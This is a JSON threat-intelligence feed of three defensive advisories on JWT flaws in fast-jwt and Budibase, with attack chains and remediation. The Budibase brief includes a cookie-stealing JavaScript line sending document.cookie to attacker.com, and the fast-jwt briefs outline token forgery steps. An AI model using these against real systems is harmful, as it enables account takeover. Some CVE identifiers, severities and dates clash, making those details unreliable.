{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata — refreshed continuously.","feed_url":"https://feed.craftedsignal.io/tags/jwt/","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2025-59420"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["jwt","vulnerability","authentication","authorization"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe \u003ccode\u003efast-jwt\u003c/code\u003e library, versions 6.1.0 and below, exhibits a critical vulnerability where it does not properly validate the \u003ccode\u003ecrit\u003c/code\u003e (Critical) Header Parameter as defined in RFC 7515. This oversight allows JWS tokens containing unrecognized extensions within the \u003ccode\u003ecrit\u003c/code\u003e array to be accepted instead of being rejected as mandated by the RFC. The vulnerability, identified as CVE-2026-35042, can lead to significant security implications, especially in environments utilizing a mix of JWT verification libraries. This flaw enables attackers to potentially bypass security policies and token binding protections, creating a window for unauthorized access or actions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker crafts a JWT with a \u003ccode\u003ecrit\u003c/code\u003e header containing an extension (e.g., \u0026ldquo;x-custom-policy\u0026rdquo;) that \u003ccode\u003efast-jwt\u003c/code\u003e does not support.\u003c/li\u003e\n\u003cli\u003eThe attacker includes this unsupported extension header (e.g., \u003ccode\u003e\u0026quot;x-custom-policy\u0026quot;: \u0026quot;require-mfa\u0026quot;\u003c/code\u003e) in the JWT header.\u003c/li\u003e\n\u003cli\u003eThe attacker signs the JWT using a valid signing key and algorithm (e.g., HS256).\u003c/li\u003e\n\u003cli\u003eThe attacker presents the crafted JWT to a system or application using the vulnerable \u003ccode\u003efast-jwt\u003c/code\u003e library for verification.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003efast-jwt\u003c/code\u003e library incorrectly accepts the token without validating the \u003ccode\u003ecrit\u003c/code\u003e header extensions.\u003c/li\u003e\n\u003cli\u003eThe application logic proceeds based on the accepted (but invalid) JWT, potentially granting unauthorized access or privileges.\u003c/li\u003e\n\u003cli\u003eIf other JWT libraries are used in the same environment that \u003cem\u003edo\u003c/em\u003e properly validate the \u003ccode\u003ecrit\u003c/code\u003e header, a \u0026ldquo;split-brain\u0026rdquo; verification scenario can occur, with some systems rejecting the token while others accept it.\u003c/li\u003e\n\u003cli\u003eThe ultimate objective is to bypass intended security policies, such as multi-factor authentication or token binding requirements, gaining unauthorized access or control.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability (CVE-2026-35042) can lead to several critical consequences. First, in mixed-library environments, it creates a split-brain verification scenario where different systems interpret the same token differently. Second, it allows attackers to bypass security policies enforced through the \u003ccode\u003ecrit\u003c/code\u003e header, such as mandatory multi-factor authentication. Finally, it can circumvent token binding mechanisms (RFC 7800 \u003ccode\u003ecnf\u003c/code\u003e confirmation), weakening overall authentication security. The full impact analysis is described in CVE-2025-59420. This vulnerability affects applications using \u003ccode\u003efast-jwt\u003c/code\u003e version 6.1.0 and earlier.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the \u003ccode\u003efast-jwt\u003c/code\u003e library to a version greater than 6.1.0 to remediate CVE-2026-35042.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect fast-jwt crit Header Bypass Attempt\u0026rdquo; to identify attempts to exploit this vulnerability in your environment.\u003c/li\u003e\n\u003cli\u003eIf a mixed-library JWT verification environment exists, evaluate and standardize on a single JWT library that correctly handles the \u003ccode\u003ecrit\u003c/code\u003e header parameter.\u003c/li\u003e\n\u003cli\u003eReview existing JWT usage to identify instances where the \u003ccode\u003ecrit\u003c/code\u003e header is used for security policy enforcement and ensure that appropriate validation is in place.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T22:01:25Z","date_published":"2026-04-03T22:01:25Z","id":"/briefs/2026-04-fast-jwt-crit-validation-bypass/","summary":"The fast-jwt library fails to validate the 'crit' header, allowing attackers to bypass security policies and potentially achieve split-brain verification in mixed-library environments.","title":"fast-jwt Library Vulnerability Allows crit Header Validation Bypass","url":"https://feed.craftedsignal.io/briefs/2026-04-fast-jwt-crit-validation-bypass/"},{"_cs_actors":[],"_cs_cves":[{"cvss":5.9,"id":"CVE-2023-48223"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["jwt","algorithm-confusion","vulnerability","fast-jwt","nodejs"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eThe fast-jwt library, a popular Node.js package for handling JSON Web Tokens (JWTs), contains a vulnerability related to algorithm confusion. An incomplete fix for CVE-2023-48223 (GHSA-c2ff-88x2-x9pg) allows attackers to bypass intended security measures by exploiting leading whitespace in the RSA public key. Specifically, the \u003ccode\u003epublicKeyPemMatcher\u003c/code\u003e regex in \u003ccode\u003efast-jwt/src/crypto.js\u003c/code\u003e does not account for leading whitespace, causing RSA public keys to be misclassified as HMAC secrets. This allows attackers to forge HS256 tokens using the RSA public key, leading to unauthorized access and privilege escalation. The vulnerability affects fast-jwt versions \u0026lt;= 6.1.0. This issue is a direct bypass of the fix for CVE-2023-48223.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a server using the vulnerable fast-jwt library for JWT verification.\u003c/li\u003e\n\u003cli\u003eThe attacker retrieves the server\u0026rsquo;s RSA public key, which is often publicly available.\u003c/li\u003e\n\u003cli\u003eThe attacker adds leading whitespace (e.g., a newline character) to the RSA public key.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JWT with the header specifying the HS256 algorithm (\u003ccode\u003ealg: 'HS256'\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe attacker sets the payload of the JWT to contain desired claims, such as \u003ccode\u003eadmin: true\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the whitespace-prefixed RSA public key as the HMAC secret to sign the JWT.\u003c/li\u003e\n\u003cli\u003eThe attacker presents the forged HS256 token to the vulnerable server.\u003c/li\u003e\n\u003cli\u003eThe server, due to the algorithm confusion vulnerability, incorrectly verifies the token using the RSA public key as an HMAC secret and grants unauthorized access based on the claims in the forged token.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to bypass authentication and authorization controls, potentially gaining administrative privileges or access to sensitive data. This could lead to data breaches, system compromise, and reputational damage. The impact is significant due to the widespread use of the fast-jwt library in various applications. This is a direct bypass of the fix for CVE-2023-48223.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade to a patched version of the \u003ccode\u003efast-jwt\u003c/code\u003e library that addresses this vulnerability. This will require updating the \u003ccode\u003efast-jwt\u003c/code\u003e package in your \u003ccode\u003epackage.json\u003c/code\u003e file and redeploying your application.\u003c/li\u003e\n\u003cli\u003eAs an immediate mitigation, sanitize RSA public keys by trimming leading whitespace before using them with the \u003ccode\u003efast-jwt\u003c/code\u003e library. This can be done using the \u003ccode\u003e.trim()\u003c/code\u003e method in JavaScript before passing the key to the \u003ccode\u003ecreateVerifier\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule that detects HS256 tokens being verified with RSA keys based on process creation logs to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eImplement logging and monitoring for JWT verification processes to detect anomalies and suspicious activity. Specifically, monitor for instances where HS256 is used with keys that appear to be RSA public keys.\u003c/li\u003e\n\u003cli\u003eReview and update any existing security controls related to JWT handling to ensure they are effective against this type of algorithm confusion attack.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-03T12:00:00Z","date_published":"2026-04-03T12:00:00Z","id":"/briefs/2026-04-fast-jwt-bypass/","summary":"The fast-jwt library is vulnerable to JWT Algorithm Confusion via Whitespace-Prefixed RSA Public Key due to an incomplete fix for CVE-2023-48223, allowing attackers to bypass intended security measures by exploiting leading whitespace in the RSA public key, enabling attackers to sign arbitrary payloads that will be accepted by the verifier, potentially leading to privilege escalation.","title":"fast-jwt Library JWT Algorithm Confusion Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-fast-jwt-bypass/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Budibase (versions prior to 3.35.10)"],"_cs_severities":["high"],"_cs_tags":["xss","account takeover","jwt","cookie"],"_cs_type":"advisory","_cs_vendors":["Budibase"],"content_html":"\u003cp\u003eBudibase, a low-code platform, is vulnerable to account takeover due to the insecure configuration of its authentication cookie. The \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie, which stores the JWT session token, is set without the \u003ccode\u003ehttpOnly\u003c/code\u003e flag. This allows JavaScript, including malicious scripts injected via Cross-Site Scripting (XSS) vulnerabilities like GHSA-gp5x-2v54-v2q5, to access the cookie\u0026rsquo;s contents.  An attacker exploiting this can steal the JWT and use it to impersonate the victim, gaining persistent access to their account.  Furthermore, the cookie lacks the \u003ccode\u003esecure\u003c/code\u003e and \u003ccode\u003esameSite\u003c/code\u003e attributes, exacerbating the risk. This vulnerability affects all Budibase deployments running versions prior to 3.35.10, as the insecure cookie configuration is hardcoded in the backend.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a Budibase instance running a vulnerable version (prior to 3.35.10).\u003c/li\u003e\n\u003cli\u003eAttacker exploits an existing XSS vulnerability, such as the stored XSS via unsanitized entity names (GHSA-gp5x-2v54-v2q5).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious JavaScript payload designed to read the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie using \u003ccode\u003edocument.cookie\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe injected JavaScript executes within the victim\u0026rsquo;s browser when they interact with the application (e.g., viewing an entity with a malicious name).\u003c/li\u003e\n\u003cli\u003eThe malicious script retrieves the JWT session token from the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie.\u003c/li\u003e\n\u003cli\u003eThe script exfiltrates the stolen JWT to an attacker-controlled server, for example, by sending it as a URL parameter in an image request: \u003ccode\u003enew Image().src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(document.cookie);\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the stolen JWT to authenticate to the Budibase application, bypassing normal login procedures.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access to the victim\u0026rsquo;s account and can perform actions as the victim, including accessing sensitive data, modifying application configurations, and creating new malicious entities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eThe lack of the \u003ccode\u003ehttpOnly\u003c/code\u003e flag on the \u003ccode\u003ebudibase:auth\u003c/code\u003e cookie transforms every XSS vulnerability in Budibase into a critical account takeover risk. Attackers can persistently compromise user accounts, leading to potential data breaches, unauthorized application modifications, and further propagation of malicious content. This impacts all Budibase deployments running vulnerable versions, potentially affecting a wide range of organizations using the platform for their internal applications and workflows. The vulnerability allows attackers to bypass authentication controls and gain full control over compromised accounts.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Budibase to version 3.35.10 or later to address the insecure cookie configuration in \u003ccode\u003epackages/backend-core/src/utils/utils.ts\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eDeploy the following Sigma rule to detect potential JWT theft attempts via unusual network connections originating from the browser.\u003c/li\u003e\n\u003cli\u003eReview and remediate all existing XSS vulnerabilities within your Budibase applications, as they can now lead to full account takeover.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-budibase-account-takeover/","summary":"The `budibase:auth` cookie in Budibase is set without the `httpOnly` flag, enabling attackers with XSS to steal JWTs and gain persistent access to user accounts.","title":"Budibase XSS Leads to Account Takeover via JWT Theft","url":"https://feed.craftedsignal.io/briefs/2024-01-budibase-account-takeover/"}],"language":"en","title":"CraftedSignal Threat Feed — Jwt","version":"https://jsonfeed.org/version/1.1"}